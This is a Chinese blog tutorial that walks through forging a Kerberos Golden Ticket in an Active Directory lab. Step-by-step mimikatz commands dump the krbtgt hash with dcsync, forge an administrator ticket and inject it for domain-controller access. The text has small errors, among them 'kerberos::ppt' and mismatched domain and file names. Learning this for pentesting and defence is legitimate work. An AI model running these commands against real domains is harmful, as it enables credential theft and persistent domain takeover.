黄金票据制作-新手入门

最新推荐文章于 2024-06-04 17:04:22 发布
最新推荐文章于 2024-06-04 17:04:22 发布
阅读量2.3k 收藏 7
点赞数 1
分类专栏: 内网渗透 文章标签: 网络安全 渗透测试 安全漏洞 安全性测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42109829/article/details/122168739
版权

0x01 前言

相信准备学习内网渗透的人,都会知道有黄金票据这个事情,而黄金票据的原理是和攻击方式,网站说的都一大堆概念,很难懂,这里我说声明一下,黄金票据的作用在于做权限维持 ,原理在于域服务器上有一个krbtgt用户
在这里插入图片描述

0x02 黄金票据和krbtgt 用户的关系

​ Golden Ticket(下面称为金票)是通过伪造的TGT(由身份认证服务授予的票据,用于身份认证,存储在内存,默认有效期为10小时),因为只要有了高权限的TGT,那么就可以发送给TGS(票据授予服务)换取任意服务的ST。可以说有了金票就有了域内的最高权限。

​ 每个用户的Ticket都是由krbtgt的密码Hash来生成的,那么,我们如果拿到了krbtgt的密码Hash,其实就可以伪造任意用户的TICKET,

krbtgt 还有一个特点就是一般他的密码是默认的,管理员一般不会去修改他,而且密码不修改对应的hash 就不会修改,所以当我们获取到了 krbtgt的hash 时,就只需要再获取域内的一台主机去

所以​ 对于攻击者来说,实际上只要拿到了域控权限,就可以直接导出krbtgt的Hash值,,再通过mimikatz即可生成任意用户任何权限的Ticket,也就是Golden Ticket。

0x03 黄金票据制作

这里我用的环境是 红日靶场的

一、红日靶场环境

https://bbs.ichunqiu.com/thread-61400-1-1.html
黄金票据的制作要求, 一个是 krbtgt 用户的hash ,另外一个是你当前用户的sid

二、制作条件

制作金票的条件:
1、域名称
2、域的SID值
3、域的KRBTGT账户密码HASH
4、伪造用户名,可以是任意的

①.获取域名称

systeminfo 或者 ipnconfig /all

在这里插入图片描述

②、域的SID值
执行 whoami /all
S-1-5-21-2756371121-2868759905-3853650604 这里注意 后面的500是权限数字,不是sid值。
在这里插入图片描述

③、获取 krbtgt 的hash值

使用管理员权限运行cmd 然后执行mimikztz , mimikatz
1、提升权限
privilege::debug

2、然后在拿到的域控机子上执行mimikatz "lsadump::dcsync /domain:test666.com /user:krbtgt"
/domain 后面带的是域名
在这里插入图片描述
3、获取到的hash为82dfc71b72a11ef37d663047bc2088fb在这里插入图片描述

三、制作命令

1、这时候,我们在域用户的主机上执行
kerberos::golden /admin:administrator /domain:0day.org /sid:S-1-5-21-2756371121-2868759905-3853650604 /krbtgt:82dfc71b72a11ef37d663047bc2088fb /ticket:2.kiribi

在这里插入图片描述
然后当下目录就会出现 2.kribi文件
在这里插入图片描述
2、然后我们再把 2.kribi 利用mimikatz 进行导入
kerberos::purge #清空已有票据
kerberos::ppt 2.kiribi #导入票据
kerberos::list # 查看票据
在这里插入图片描述

3、验证
1、此时就可以通过dir成功访问域控的共享文件夹。这里10.10.10.10 为域控主机

在这里插入图片描述

输入 klist 查看票据

在这里插入图片描述

输入 klist purge 清除票据

在这里插入图片描述

0x04 总结

黄金票据是伪造票据授予票据(TGT),也被称为认证票据。如下图所示,与域控制器没有AS-REQ或AS-REP(步骤1和2)通信。由于黄金票据是伪造的TGT,它作为TGS-REQ的一部分被发送到域控制器以获得服务票据。

在这里插入图片描述
如果你们感觉这个文章对你们有用,麻烦各位大佬给个赞,激励我继续写文章。

0x05 引用

https://shu1l.github.io/2020/06/06/qian-xi-huang-jin-piao-ju-yu-bai-yin-piao-ju/

黄金票据的制作与使用

kuxing_admin
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
黄金票据原理制作与利用
G3et的博客
01-14 558
1、用域管理运行mimikatz抓取完所需的东西 ==> 再到域用户机器上运行伪造票据。2、krbtgt只存在域控上面,普通机器提权之类的无法获取到krbtgt的hash3、黄金票据可以获取任何Kerberos 服务权限,且由 krbtgt 的 hash 加密,黄金票据在使用的过程需要和域控通信****加粗样式。
域权限维持—黄金票据和白金票
lza20001103的博客
04-15 574
域权限维持—黄金票据和白金票
黄金票据~
最新发布
Y22Lee的博客
06-04 1089
这里大家肯定有点矛盾,我既然都可以获取krbtgt,我直接使用域中的机器进行PTT就可以了,为什么还要用工作组中的机器(如果域中的机器有杀软呢?黄金票据制作有多种方式,黄金票据本质上是伪造TGT,既然是伪造所以在任何电脑上都可以伪造,生成的TGT票据就可以打入内存(PTT),从而实现对整个域的控制,接下来我们看一下如何伪造。黄金票据一般是伪造的TGT,生成这个TGT,不需要和KDC进行校验,金票可以在本地直接生成,生成的的金票在非域机器和域内机器都可以使用。第三步:获取伪造TGT使用的域SID和域名。
黄金票据制作原理及利用方式
Happy峰
09-23 2704
Golden Ticket黄金票据制作原理及利用方式 Krbtgt账户介绍 krbtgt用户,是系统在创建域时自动生成的一个帐号,其作用是密钥分发中心的服务账号,其密码是系统随机生成 的,无法登录主机 黄金票据原理 TGT=Krbtgt的html hash 加密 1、Kerberos中的TGT和Logon Session Key(CT_SK)是AS返回的 ,TGP它是由Krbtgt加密和签名的 ,krbtgt的NTLM Hash又是固定的,而CT_SK并不会保存在KDC中。 2、所以只要得到krbtgt
黄金票据制作
m0_70613012的博客
04-02 261
三个靶场的操作系统分别为Windows Server 2016、Windows 10和Windows 7。其中Windows Server 2016担任域控制器的角色,而Windows 10和Windows 7则作为域成员机。在域中有三个用户分别为:demo1、demo2和demo3。使用黄金票据前提是你已经控制了整个域的域控制器。使用mimikatz中的kerberos::golden模块创建黄金票据,该票据的格式为.kirbi。首先我们先登录一个域的普通账户,然后尝试通过dir访问域控的共享文件夹。
黄金票据制作与使用
热门推荐
Shanfenglan's blog
08-27 24万+
原理 黄金票据的原理就是用krbtgt的hash来伪造TGT的内容。更改里面的client参数与session key等。让TGS以为我就是那个我所声称的人,当然我一般会声称自己是administrator。第四步主要是来验证客户端的身份。 所谓的黄金票据其实就是kerberos认证的第二个阶段中的tgs的ticket也就是TGT。这个ticket相当于对请求端的一个身份认证的凭据,如果可以伪造这个ticket,那么就可以伪造任意身份,而黄金票据就是一个实现方式。 kerberos协议原理请参考:NTML认
内网渗透--Golden Ticket(黄金票据制作&利用
qq_62169455的博客
01-17 1337
伪造TGT,不需要和KDC进行校验,金票可以直接在本地生成,在域内机器和非域内机器都可以使用。
票据法-复习题及答案.pdf
01-25
票据法-复习题及答案.pdf
用excel制作票据打印模板的技巧.pdf
11-16
用excel制作票据打印模板的技巧.pdf
映美 FP-650K 平推票据打印机 用户手册.pdf
12-23
映美 FP-650K 平推票据打印机是一款专为商业和办公环境设计的高效设备,主要用于打印各种票据和文档。用户手册是确保安全、正确使用打印机的关键资源,其中包含了一系列重要的操作指南和安全注意事项。 首先,使用...
HAP框架-SSO入门手册.zip
10-04
3. **票据验证过滤器(Ticket Validation Filter,TVF)**:SP中的一环,用于接收AC返回的票据,并向AC验证该票据的有效性。 4. **会话管理(Session Management)**:在验证票据成功后,SP会在本地创建或更新用户...
映美 TP-590K 平推票据打印机 用户手册.pdf
12-23
映美 TP-590K 平推票据打印机是一款专为商业和办公环境设计的高效打印设备,尤其适合处理各种票据和文档。该用户手册详细介绍了如何安全、正确地使用和维护这款打印机,以确保其长期稳定的工作性能。 在安全指导...
基于MSF框架下的kiwi模块制作黄金票据
weixin_60109175的博客
04-05 5483
目录 一、kiwi模块使用简介 1.权限问题 2.使用注意事项 3.关于kiwi的命令简介 二、实验过程 1.环境构成 2.实验步骤 三、黄金票据制作使用 1.制作票据的条件,以及如何获取该条件内容 2.制作黄金票据 3.黄金票据的使用 一、kiwi模块使用简介 1.权限问题 kiwi模块的使用需要域内管理员或者系统权限,如果是非管理员权限那么使用会受到很大的限制 2.使用注意事项 msf中的kiwi模块同时支持32位和64位操作系统,...
3.4 Golden Ticket黄金票据制作原理及利用方式
GloryGod的博客
08-24 244
krbtgt用户,是系统在创建域时自动生成的一个帐号,其作用是密钥分发中心的服务账号,其密码是系统随机生成的,无法登录主机。
实战中黄金票据制作
blue_fantasy的博客
01-29 5187
Text. 0x00 前言 当控制了一台域控服务器的情况下,为了不打草惊蛇又为了长时间控制,可以考虑使用黄金票据进行权限维持。 目前以控制一台域内成员机器WIN2016,ip:10.0.10.111 无杀软 一台域控机器WIN2019,ip:10.0.10.110 有杀软 域名:vulntarget.com 域管:vulntarget\administrator 域管密码:Admin@666 通过之前的攻击,我们拿到了域管理员的账号密码,...
【内网学习笔记】28、黄金票据
TeamsSix 的 CSDN 空间
09-27 507
0、前言 RT 在利用黄金票据(Golden Ticket)进行 PTP 票据传递时,需要先知道以下信息: 伪造的域管理员用户名 完整的域名 域 SID krbtgt 的 NTLM Hash 或 AES-256 值 其中 krbtgt 用户是域自带的用户,被 KDC 密钥分发中心服务所使用,属于 Domain Admins 组。 在域环境中,每个用户账号的票据都是由 krbtgt 用户所生成的,因此如果知道了 krbtgt 用户的 NTLM Hash 或者 AES-256 值,就可以伪造域内任意用户的身
权限维持-域渗透攻击-Golden Ticket (黄金票据)
weixin_43227251的博客
04-13 1626
Golden Ticket (黄金票据) 简义 : 在拥有普通域用户权限和 krbtgt账号的hash的情况下,获取域管理员权限。 发生在上面的过程3,可以伪造TGT(前提是获取krbtgt账号的口令散列值(hash)),宣称自己是域内任何账号,包括域管或者不存在的用户。 1. 首先,黄金票据是全功能的TGT。也就意味着万能票据可用于Kerberos认证的任何服务。票据授予服务盲目地相信TGT中的信息,然后处理TGT并颁发服务票据。 内存中插入黄金票据并不需要提升权限。而且默认情况下,黄金票据的有效期是10
域中黄金票据
https://www.cnblogs.com/zpchcbd/
09-11 1255
黄金票据(golden ticket):伪造票据授予票据(TGT),也被称为认证票据。 krbtgt账户:每个域控制器都有一个“krbtgt”的用户账户,是KDC的服务账户,用来创建票据授予服务(TGS)加密的密钥。 0x00 金票据利用条件: 域控中krbtgt账户NTLM密码哈希 域中的sid值 一台域中主机 与其说是一种攻击方式,不如说是一种后门,当域控权限掉后,再重新获取权限,因为常见...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值